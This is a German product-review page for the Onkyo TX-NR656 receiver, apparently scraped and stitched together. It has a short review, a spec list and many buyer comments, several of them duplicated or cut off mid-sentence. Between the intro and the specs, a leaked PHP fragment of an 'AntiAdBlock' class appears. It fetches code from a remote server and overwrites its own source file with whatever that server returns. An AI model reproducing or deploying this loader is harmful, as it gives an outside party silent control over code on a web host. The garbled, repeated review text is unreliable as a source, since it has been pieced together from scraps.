Onkyo TX-NR656, Kurzer Testbericht

High tech, die ich zum schnäppchenpreis (333 €) gekauft habe. Könnte noch nix finden, was dieser receiver nicht kann.

Ich habe einen klipsch sw 115 subwoofer und 2 sony sa-vs700ed dahinter, das ist wie im kino.

Nachdem mein alter surroundverstärker langsam seinen geist aufgibt, musste was neues her. Die hdmi anschlüsse sind für meine ansprüche ausreichend. Ein paar mehr optische eingänge wären gut. Die einstellung funktioniert vollkommen automatisch. Mikrofon anschließen und an der hörposition platzieren. Den anweisungen auf dem angeschlossenen fernseher folgen und den rest macht das gerät von alleine. Die einstellungen werden auf den raum optimiert. Das ergebnis kann sich hören lassen. Wichtig: die angeschlossenen boxen sollten genug power zur verfügung haben.

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2430765(); return $__aab->get();

Key Spezifikationen für Onkyo TX-NR656 (B) 7.2-Kanal-A/V-Netzwerk-Receiver (160 W/Kanal,DTS: X aufrüstbar, Dolby Atmos, AirPlay, 384 kHz/32-Bit D/A-Wandler, 8 HDMI-Eingänge/2 Ausgänge) schwarz:

  • Geben Sie Ihr Modell ein,
    um sicherzustellen, dass dieser Artikel passt.
  • DTS:X
  • Drahtlose Audiowiedergabe mit Google Cast
  • Bluetooth-Wiedergabe / Wi-Fi mit Spotify und Tidal*
  • Drahtlose Audiowiedergabe in mehreren Räumen mit FlareConnect
  • Firmware-Update / optionaler Onkyo-Drahtloslautsprecher erforderlich.

Kommentare von Käufern

“Mit PS4 Pro katastrophal. (Problem gefixt), Perfektes Gerät, Einfach einzustellen mit sehr gutem Klangbild”

Habe meinen alten marantz receiver in rente geschickt. Und gegen den onkyo tx-nr656 getauscht. Installation lief absolut problemlos, das einmessen der boxen mit dem mitgelieferten mikrofon war kinderleicht. Der sound ist für mein empfinden sehr gut. 1 lautsprechersystem und habe die verbleibenden 2 kanäle für zone b für die terrasse verwendet. Die onkyo av controller app ist echt toll. Einfach gestaltet und man ist schnell da, wo man was auswählen möchte. Das einschalten der zone b über die app ist echt klasse gelöst. Mir war wichtig, dass im standby betrieb das hdmi signal durchgeschleift wird. Sogar ein umschalten der hdmi eingänge ist im standby möglich. Somit werden dann kann strom gespart werden, wenn man “nur” mal schnell tv schauen möchte ohne surround anlage. Für den ausbau des multiroom systems (bad, arbeitszimmer, schlafzimmer) habe ich beim onkyo support erfahren, dass ende januar 2017 hier die neuen multiroom lautsprecher verfügbar sein sollen, die den neuen fireconnect standard unterstützen. Alles in allem in ich sehr zufrieden mit dem receiver.

Mein alter stereoverstärker musste ersetzt werden, 25 jahre alt auch von onkyo. Die wahl viel auf den 656 aus folgendem grund:-genug leistungsreserven, vergleichbar mit meinem alten verstärker-guter testergebnisse (guter stereoklang, ausstattung, preisleistung)-phonoeingang-vernünftige schraubklemmen für lautsprecherbaugleich ist der pioneer 1131ich bin sehr begeistert von dem funktionsumfang. Nach anfänglichem herumprobieren habe ich den arc (audioreturnchannel) zum laufen gebracht. Receiver stellt sich automatisch ein, wenn fernseher eingeschaltet wird. Spotify connect funktioniert sehr gut. Diese features sind allerdings kein alleinstellungsmerkmal sondern schon standard in der preiskategorie. Der stereoklang ist auch sehr gut. Es gibt einen nachfolger für dieses gerät (ich glaube 676). Allerdings sehe ich bei diesem keinen mehrwert für mich. Außerdem ist das hier beschriebene gerät nun ca. Onkyo TX-NR656 (B) 7.2-Kanal-A/V-Netzwerk-Receiver (160 W/Kanal,DTS: X aufrüstbar, Dolby Atmos, AirPlay, 384 kHz/32-Bit D/A-Wandler, 8 HDMI-Eingänge/2 Ausgänge) schwarz Einkaufsführer

Super gerät, erfüllt voll und ganz meine erwartungen. Betreibe den verstärker mit einem bose system. Klangwiedergabe super, viele funktionen. Weniger toll finde ich den ausgang für den zweiten raum welcher nur über die app steuerbar ist. Sonst top gerät und empfehlenswert.

Ich habe die anlage zuhause mit einem teufel 5. 2 dolby atmos system laufen. Der sound ist absolut klasse. Die vielfältigen funktionen sowie mehr als ausreichend hdmi anschlüsse sind topdie bedienung per app ist klasseeinzige schönheitsfehler:- das osd sieht etwas billig aus (hätte man schöner machen können)- der usb anschluss sollte auf die front, statt nach hinten- das frontdisplay hätte man auch schöner machen können.

Dieses gerät ist seit ende 2016 die neue schaltzentrale für das home-entertainment in meinem wohnzimmer. Funktionalität und bedienung haben sich gegenüber dem vorgänger (harman kardon avr 365) erheblich verbessert. Der klang liegt auf dem selben niveau wie bei dem seinerzeit über 1000 eur teuren harman kardon. Es gibt aber auch einen wermutstropfen. Wer die wertige verarbeitung und die edle anmutung zu schätzen gelernt hat, die vor ein paar jahren auch bei onkyo noch zum guten ton gehörte, dem wird es ähnlich wie mir ergehen: beim anfassen der front und des schön großen lautstärkereglers kommt ernüchterung auf. Kein metall – nur kunststoff, das den metall-look zu imitieren versucht. Kein massiv-griffiger metalldrehregler mit potentiometer dahinter, idealerweise mit sanft rastenden stufen – nein, es ist nur noch ein eher wabbelig zu führender imitator solcher feiner vorgänger, der nur noch digitale werterhöhungen an die verstärkersektion weitergibt. Desgleichen die fernbedienung – ein ganz schlichtes teil ohne beleuchtung oder wenigstens haptische freuden. Wenn man darüber hinwegsehen (bzw. -fühlen) kann, bekommt man aber sehr viel leistung fürs geld.

Einfache einrichtung/alle notwendigen anschlüsse vorhanden/hervorragendes klangbildwer mehr will befindet sich in einer anderen preisregion. Der nr656 schöpft aus meinen lautsprechern das potenzial hörbar besser aus.

Ich habe den onkyo txnr 656 am 10. Alles stimmt von erste bis lezte einstellung. Super empfehlung alle 5 sterne verdient. 2 eingestellt mit canton gle 470 serie vorne, einem teufel us2110/1sw vorne, und mivoc sw1100a als zwieite sabwoofer hinten und vier jbl one als hintergrund lautschprecher. Super dynamiche ton wiedergabe bei film in dolby digital und music in 7. Was auch richtig ist wenn mann zwei große lautschprecher vorne hat und zwei sabwoofer hatt mann bei music wiedergabe stereo einstellungen 2. Vorr allem wenn mann im plannung hat einen platenschpieler zu kaufen.

Ich habe mir nach dem einzug in unser neues einfamilienhaus natürlich auch eine entsprechende soundanlage gewünscht. Nach vielem recherchieren bin ich auf diesen verstärker gestoßen. Ich möchte nicht lange um den heißen brei reden. Er kann alles, von bluetooth, airplay, spotify, 2 zonen-verstärkung usw. Einfach alle geräte an den verstärker anschließen, automatisches setup mittels mitgeliefertem mikrofon durchlaufen lassen und der verstärker stellt sich passend zum raum ein. Das klangerlebnis ist der wahnsinn. Ich würde ihn auf jeden fall weiter empfehlen.

Aufstellen, anschließen, enrichten, alles sehr gut und einfach. Beim versuch das internetradio zu hören, kan es alle 15 sekunden zum verbindungsabbruch. Das wlan netz war hervorragend, laut anzeige des receivers, daher ist es für mich nicht ganz plausibel. Da die option internetradio für uns wichtig ist, ging das gerät leider an amazon zurück. Korrektur: diese rezension ist nicht gültig, sie war für einen zuvor bestellten artikel gedacht. Wenn amazon die möglichkeit hat, bitte löschen.

Habe mir den onkyo tx-nr656 für mein selbst zusammengestelltes heimkinosystem zugelegt. Center speaker, front speaker und surround speaker von heco victa prime.

Habe nach langen jahren meinen geliebten harmann kardon avr 135 mit dem onkyo getauscht. Kurz und bündig, soundqualität und pegelfestigkeit sind an meinen teufel boxen brillant. Ich bin mit meiner entscheidung für den onkyo sehr glücklich.

Ich hatte einen jvc-verstärker aus den 80ern. Damit war natürlich nicht mehr viel anzufangen. Der onkyo ist jetzt meine audiozentrale für tv, plattenspieler, radio, internetradio und pc. Der wifi-anschluss war problemlos. Sehr angenehm finde ich, dass man, wenn das tv einen hdmi cec-kompatiblen anschluss verfügt, das komplette menu des receivers über den tv-bildschirm steuern kann. Auch verbinde ich mein iphone und ipad problemlos via airplay. Mittels der ausmessung durch das mitgelieferte setup-mikrofon kann ich das beste aus meinen mittelmäßigen stereo-3 wege-boxen rausholen. Die nächste obligatorische investition ist eine ansprechende 5. 1-sound lösung, damit der verstärker seine vollen vorzüge ausspielen kann. Einen stern ziehe ich ab, weil die optik des volume-regler aus plastik nicht überzeugt wie bereits in anderen kommentaren zu lesen ist.

So, der 656 ist angeschlossen, eingestellt und kalibriert. Ein erster kurzer test mit expendables 3 (dolby atmos) und der xbox one s (forza horizon 2) ist erfolgt:insgesamt unterscheidet sich der 656 von der einrichtung nur in wenigen teilen vom nr646 und rz800. Die einmessung erfolgte mittels accueq und das ergebnis entsprach fast exakt dem des 800 inklusive “falscher” trennfrequenzen der ls. Die entfernungen stimmten diesmal aber. Nach ein paar Änderungen und feintuning ging es ans hören. Zugegeben, ich hatte aufgrund der revision von accueq in 2016 etwas mehr erwartet, aber gut, so lange der klangeindruck passt, ist es ja ok. Das osd ist etwas aufgehübscht, aber da hatte ich auch mit dem 646/rz800 auch keine probleme. Der klangeindruck entspach auch hier wieder dem des rz800 und zwar im positivem sinne, nämlich das der klang klar, direkt und ohne dröhnen des sub in den raum strahlte. Bisher gab es bei mir immer eine mode bei ca. Das hat der 656, wie auch der rz800, im griff. Wechsel zur xbox one s:auch hier hatte ich das phänomen, dass ich die lautsärke gegenüber einer blu-ray um 10 punkte erhöhen muss, damit ich eine ähnliche lautstärke habe wie vom bd-player. Auch das war beim rz800 so, beim 646 nicht. Hier war es eher andersherum, dass ich bei der xbox den ton etwas leiser stellen musste, als beim bd-player. Warum das so ist bleibt mir schleierhaft.

Rezension zu onkyo tx-nr 656: da ich vorher einen yamaha-receiver hatte ging meine suche zuerst in diese richtung aber ich wurde u. Aufgrund der vielen anschlußmöglichkeiten, dem phono-eingang und dem guten preis/leistungsvergleich auf diesen onky-receiver aufmerksam, habe lange verglichen und ihn mir dann im angebot gekauft. Was soll ich sagen: ich wurde nicht enttäuscht. Da ich auch einen beamer habe kam es mir sehr entgegen dass der onkyo zwei hdmi-ausgänge hat und ich tv und beamer parallel anschließen kann. 8 hdmi-eingänge und 2 ausgänge sind schon klasse. Br-player, xbox, pc, dvb-t2-receiver, etc. Alles läßt sich schnell und einfach anschließen. Internet ist bei mir über lan-kabel angeschlossen und nach firmware-update kann er mit allen aktuellen hd-tonformaten (incl. Der klang ist perfekt und als ich mir dann “hans zimmer – live in prag” angesehen bzw. Angehört habe kam richtig begeisterung auf. Die ganzen eigenschaften aufzuzählen wurde die rezension “sprengen” daher konzentriere ich mich kurz auf ein paar andere dinge.

Ich hatte den verstärker mit einem etwas ungutem bauchgefühl gekauft; er war im “last-minute-angebot” für 333 € hier bei amazon. Mein bis dato genutzter verstärker fing in den letzten wochen an zu schwächeln, leider. Den harman-kardon avr 7500 nutze ich seit 2005. Ebenso meine boxen (canton ergo 100, ergo cm51 usw. )old school 😉 aber einfach guter klangda die standboxen doch relativ leistungshungrig sind benötige ich also einen verstärker mit “bums”. Daher auch die befürchtung, dass der nr656 hier überfordert sein könne. Weit gefehlter verfügt über mehr als genug leistung(sreserven), dieses sei vorweg gesagt. Mein alter harman hatte natürlich auch nicht solche netten features wie hdmi und onlineradio etc. Fullhd war damals noch etwas für vollprofis, dvd das höchste der (privaten) gefühle.

2 av receiver für das geld gut ausgestattet mit z. Den klang finde ich auch gut. Wenn man große front lautsprecher hat kann man zum normalen tv gucken den sub sogar ausgeschaltet lassen. Lieferumfang:-av receiver-antenne-einmessmikrofon-fernbedienung-netzkabel-kurzanleitung(zum einrichten)zusammenfassung:positiv:-viele klangeinstellungen/- optimierungen möglich- kostenlose app funktioniert gut-bi amping möglich-guter klangnegativ:-kein usb anschluss vorn-keine bildverarbeitung zur hochskalierung-displayfarbe (grün) muss heutzutage wirklich nicht mehr sein(nur beim schwarzen gerät)-beim internetradio sind keine programmspeichertasten möglich, wie im fm modus. Presets können gespeichert werden, aber bis zu der liste ist ein „langer“ weg. Bei anderen radios geht es doch auch. Man muss das radio einschalten und die musik muss von alleine laufen ohne das man den sender erst suchen muss.

Nach nun zwei tagen im einsatz, ein paar eindrücke zum onkyo tx-nr656 (b). Nach dem super schnellen versand, vielen dank amazon, den receiver ausgepackt und verkabelt. Ich betreibe ihn in einer 5. Die einrichtung ging erstaunlich leicht von der hand. Die einzelnen schritte werden mittels osd, in einer ansprechenden optik auch für hifi anfänger verständlich dargestellt. Nach abschluss aller einstellungen war ich positiv Überrascht. Ich dachte, dass ich mit meinem bisherigen yamaha receiver bereits einen klasse heimkino sound hatte. Der onkyo übertrifft den yamaha jedoch deutlich. Die kraft und der raumklang sowohl bei filmen als auch musik im stereo modus klingen fantastisch.

Einwandfrei – hat alles was man braucht – ich bin sehr zufrieden.

Wir haben unseren älteren onkyo (fast 10 jahre dienst) mit ähnlichen leistungen gegen dieses gerät ausgetauscht. Super sind die mehreren hdmi-anschlüsse, so dass der switcher – den wir voher brauchten und der manchmal probleme machte – ausgedient hat. Jetzt kann man bequem über die tasten vorne den anschluss wählen. Verbessert ist auch der lautstärke-regler-weg, da man jetzt mit einer kürzeren drehbewegung schneller die lautstärke regeln kann, wobei das feintuning nicht auf der strecke bleibt. Super toll ist jetzt das direkte ansteuern des gerätes über das i-pad/i-phone. Musikhören und regeln vom platz aus; sehr bequem. Wir haben ihn auch in schwarz gewählt, da er damit farblich zu den anderen vorhandenen geräten optisch besser dazupasst. Wer ein top-steuergerät sucht ist mit diesem gerät in einer heimkinoanlage bestens bedient bei einem passenden preis.

Mein in die jahre gekommener yamaha rxv-475 sollte aufgrund von fehlenden durchschleifen echter 4k signale und sporalischen tonaussetzern über arc, hdmi ( philips 55pus7101) ausgetauscht werden. Wenn schon was neues dann auch die neuen tonformate dolby atmos und dts x. Wichtig war mir auch das durchschleifen von 4k in 4:4:4 12bit, das funktioniert einwandfrei. Upscaling über den verstärker (1080p zu 4k) ist bei mir deaktiviert. Das signal vom blu-ray player ( panasonic dmp-404) wird unverändert durgeschleift. Eigentlich wollte ich wieder einen yamaha, der auserwählte hatte aber zu viele bugs bzw schlechte rezensionen. Nach langen suchen und rezensionen lesen, stieß ich auf den onkyo. Da der onkyo oft im bundel mit klipsch verkauft wird und viele meiner amerikanischen klipsch-anhänger, diesen auch nutzen und sehr zufrieden damit sind, war für mich klar diesmal ein onkyo. Diesen habe ich dann zum super preis von 279€ auf der plattform mit dem “e” erstanden. Der verstärker wirkt wertig und ist gut verarbeitet.

Summary
Review Date
Reviewed Item
Onkyo TX-NR656 (B) 7.2-Kanal-A/V-Netzwerk-Receiver (160 W/Kanal,DTS: X aufrüstbar, Dolby Atmos, AirPlay, 384 kHz/32-Bit D/A-Wandler, 8 HDMI-Eingänge/2 Ausgänge) schwarz
Rating
5,0 of 5 stars, based on 39 reviews

One thought on “Onkyo TX-NR656, Kurzer Testbericht”

  1. Rezension bezieht sich auf : Onkyo TX-NR656 (B) 7.2-Kanal-A/V-Netzwerk-Receiver (160 W/Kanal,DTS: X aufrüstbar, Dolby Atmos, AirPlay, 384 kHz/32-Bit D/A-Wandler, 8 HDMI-Eingänge/2 Ausgänge) schwarz

    Eins vor weg, der receiver hat einen guten klang zum musik hören, auch die app gefällt mir gut. Dlna und netzwerk sind stabil (nicht wie bei denon bspw), aber wenn man seine ps4 pro darüber laufen lassen will gibt es nur probleme. Kann man auch im playstation forum nachlesen. Das zusammenspiel zwischen ps4 pro und sony tv (a1 oled, in meinem fall), klappt überhaupt nicht, der receiver schaltet sich ständig einen wolf, hin und her, bild ist weg, dann wieder kein ton, manchmal geht das 10 min so bis er sich mal “gefangen” hat, mein 6 jahre alter pioneer davor hatte problemlos funktioniert. Das geht leider garnicht, wenn man mal überlegt wieviele leute eine ps4 pro besitzen. Ich finde es selbst sehr schade, weil eigentlich alles passt. Wer keine ps4 pro darüber laufen lassen möchte, dem kann ich den receiver aber durchaus empfehlen. Der klang ist spitze in der preisklasse. 18*das mit dem bekannten ps4 pro bug habe ich nun gefixt bekommen. Habe eine rezension vom 676 gelesen, wo ein kunde so nett war und seine erfahrungen geteilt hat. Und zwar, wenn man die ps4 pro an den hdmi2 port anschliesst, gibt es keine probleme mehr. So muss ich nun fairerweise auch auf 5 sterne vergeben.
    1. Eins vor weg, der receiver hat einen guten klang zum musik hören, auch die app gefällt mir gut. Dlna und netzwerk sind stabil (nicht wie bei denon bspw), aber wenn man seine ps4 pro darüber laufen lassen will gibt es nur probleme. Kann man auch im playstation forum nachlesen. Das zusammenspiel zwischen ps4 pro und sony tv (a1 oled, in meinem fall), klappt überhaupt nicht, der receiver schaltet sich ständig einen wolf, hin und her, bild ist weg, dann wieder kein ton, manchmal geht das 10 min so bis er sich mal “gefangen” hat, mein 6 jahre alter pioneer davor hatte problemlos funktioniert. Das geht leider garnicht, wenn man mal überlegt wieviele leute eine ps4 pro besitzen. Ich finde es selbst sehr schade, weil eigentlich alles passt. Wer keine ps4 pro darüber laufen lassen möchte, dem kann ich den receiver aber durchaus empfehlen. Der klang ist spitze in der preisklasse. 18*das mit dem bekannten ps4 pro bug habe ich nun gefixt bekommen. Habe eine rezension vom 676 gelesen, wo ein kunde so nett war und seine erfahrungen geteilt hat. Und zwar, wenn man die ps4 pro an den hdmi2 port anschliesst, gibt es keine probleme mehr. So muss ich nun fairerweise auch auf 5 sterne vergeben.
      1. Chromecast dauert leider für jedes lied zum verbinden 20 sec, wenn es überhaupt funktioniert. 100k leitung, tritt bei spotify & google play auf.
  2. Chromecast dauert leider für jedes lied zum verbinden 20 sec, wenn es überhaupt funktioniert. 100k leitung, tritt bei spotify & google play auf.
  3. Rezension bezieht sich auf : Onkyo TX-NR656 (B) 7.2-Kanal-A/V-Netzwerk-Receiver (160 W/Kanal,DTS: X aufrüstbar, Dolby Atmos, AirPlay, 384 kHz/32-Bit D/A-Wandler, 8 HDMI-Eingänge/2 Ausgänge) schwarz

    Heut die einzelnen stärken zu schreiben , würde den rahmen sprengen. Das teil ist einfach nur mega genial. Sei im tv bereich-games -musik. Man braucht zeit die einzelnen einstellungen zu entdecken -diese sind so individuell einzustellen – wahnsinn. Hab von teufel die ultima 40 angeschlossen – der nachbar findet das teil absolut schlecht *g* ( sorry h. Klemm – wir leben doch nur einmal)jungs – das teil heißt- alarm.
  4. Rezension bezieht sich auf : Onkyo TX-NR656 (B) 7.2-Kanal-A/V-Netzwerk-Receiver (160 W/Kanal,DTS: X aufrüstbar, Dolby Atmos, AirPlay, 384 kHz/32-Bit D/A-Wandler, 8 HDMI-Eingänge/2 Ausgänge) schwarz

    Heut die einzelnen stärken zu schreiben , würde den rahmen sprengen. Das teil ist einfach nur mega genial. Sei im tv bereich-games -musik. Man braucht zeit die einzelnen einstellungen zu entdecken -diese sind so individuell einzustellen – wahnsinn. Hab von teufel die ultima 40 angeschlossen – der nachbar findet das teil absolut schlecht *g* ( sorry h. Klemm – wir leben doch nur einmal)jungs – das teil heißt- alarm.
    1. Vornewegmein ziel war es im heimkino in die dolby atmos welt einzutauchen, alles 4k und hdr tauglich zu machen und meine einsteiger anlage gegen eine kraftvollere auszutauschen. Ich habe mir nach langem vergleichen als herzstück den onkyo 656 ins wohnzimmer gestellt und bereue diese entscheidung absolut nicht. Mein heimkino besteht aus folgenden komponenten. Fernseher ist ein samsung ue55js8080 (österreichisches gegenstück zu 8090) – uhd blu-ray player ist die x-box one s – lautsprecher sind eine kombination aus den onkyo atmos lautsprechern skh-410 und der onkyo 5. Für bilder und pc spiele ist ein aktuelles acer notebook angeschlossen mit 4k wiedergabe im 2d bild. Herzstück des ganzen ist nun der onkyo 656, welcher über arc mit dem fernseher verbunden ist. Ton / bildqualitätdie bildqualität ist, da der receiver nur durchschleust, unverändert. Der ton hingegen phänomenal und bei einer dolby atmos spur wird man in der tat vom ton eingehüllt. Auch bei hoher laustärke ist der klang pegelfest und sehr klar. Diese leistung ist mehr als ausreichend für unser wohnzimmer mit ca. Gerade in kombination mit den skh-410 lautsprechern erlebt man, auch bei nicht dolby atmos filmen, ein vorher nicht dagewesenes raumgefühl. Ebenso höre ich nun auch nebengeräusche, die ich vorher nicht wahrgenommen habe sehr gut und klar heraus, ohne dass diese stören oder ich bewusst darauf achte. Kein vergleich zu meinem einsteiger paket, das nun im partykeller sein neues zuhause gefunden hat.
      1. Vornewegmein ziel war es im heimkino in die dolby atmos welt einzutauchen, alles 4k und hdr tauglich zu machen und meine einsteiger anlage gegen eine kraftvollere auszutauschen. Ich habe mir nach langem vergleichen als herzstück den onkyo 656 ins wohnzimmer gestellt und bereue diese entscheidung absolut nicht. Mein heimkino besteht aus folgenden komponenten. Fernseher ist ein samsung ue55js8080 (österreichisches gegenstück zu 8090) – uhd blu-ray player ist die x-box one s – lautsprecher sind eine kombination aus den onkyo atmos lautsprechern skh-410 und der onkyo 5. Für bilder und pc spiele ist ein aktuelles acer notebook angeschlossen mit 4k wiedergabe im 2d bild. Herzstück des ganzen ist nun der onkyo 656, welcher über arc mit dem fernseher verbunden ist. Ton / bildqualitätdie bildqualität ist, da der receiver nur durchschleust, unverändert. Der ton hingegen phänomenal und bei einer dolby atmos spur wird man in der tat vom ton eingehüllt. Auch bei hoher laustärke ist der klang pegelfest und sehr klar. Diese leistung ist mehr als ausreichend für unser wohnzimmer mit ca. Gerade in kombination mit den skh-410 lautsprechern erlebt man, auch bei nicht dolby atmos filmen, ein vorher nicht dagewesenes raumgefühl. Ebenso höre ich nun auch nebengeräusche, die ich vorher nicht wahrgenommen habe sehr gut und klar heraus, ohne dass diese stören oder ich bewusst darauf achte. Kein vergleich zu meinem einsteiger paket, das nun im partykeller sein neues zuhause gefunden hat.
  5. Rezension bezieht sich auf : Onkyo TX-NR656 (B) 7.2-Kanal-A/V-Netzwerk-Receiver (160 W/Kanal,DTS: X aufrüstbar, Dolby Atmos, AirPlay, 384 kHz/32-Bit D/A-Wandler, 8 HDMI-Eingänge/2 Ausgänge) schwarz

    I’ve used onkyo tx-sr506 for 8 years almost. Due to upgrade of equipment to 4k hdr (ps4, xbox, tv) had to upgrade receiver too. After installing it, which was very easy taking into account the on-screen menu, i was amazed by the positive changes. Sound is now much more realistic, i can hear both “tiny” and short sounds like falling drops of water and very strong, loud sounds. Together with my jamo s606 speakers and onkyou skh-410 for atmos i am really very satisfied with the purchase.
  6. Rezension bezieht sich auf : Onkyo TX-NR656 (B) 7.2-Kanal-A/V-Netzwerk-Receiver (160 W/Kanal,DTS: X aufrüstbar, Dolby Atmos, AirPlay, 384 kHz/32-Bit D/A-Wandler, 8 HDMI-Eingänge/2 Ausgänge) schwarz

    I’ve used onkyo tx-sr506 for 8 years almost. Due to upgrade of equipment to 4k hdr (ps4, xbox, tv) had to upgrade receiver too. After installing it, which was very easy taking into account the on-screen menu, i was amazed by the positive changes. Sound is now much more realistic, i can hear both “tiny” and short sounds like falling drops of water and very strong, loud sounds. Together with my jamo s606 speakers and onkyou skh-410 for atmos i am really very satisfied with the purchase.
    1. Hierzu fehlen mir eigentlich die worte. Klang in verbindung mit einem harman karton hkts 30 5. Habe zwar die originalkabel der speaker tauschen müssen, aber um die geht es hier nicht. Das einrichten mit dem mitgelieferten mikro ist auch sehr einfach, überhaupt die ganze installation ist sehr einfach und teilweise selbsterklärend. Habe ich bei anderen herstellern schon anders gesehen. Die verarbeitung ist toll, die vielzahl an anschlussmöglichkeiten lässt keine wünsche offen und da auch wlan sowie bluetooth und die fähigkeit für multiroom mit an bord ist. Danke onkyodas alles für diesen preis ist echt beeindruckend.
  7. Rezension bezieht sich auf : Onkyo TX-NR656 (B) 7.2-Kanal-A/V-Netzwerk-Receiver (160 W/Kanal,DTS: X aufrüstbar, Dolby Atmos, AirPlay, 384 kHz/32-Bit D/A-Wandler, 8 HDMI-Eingänge/2 Ausgänge) schwarz

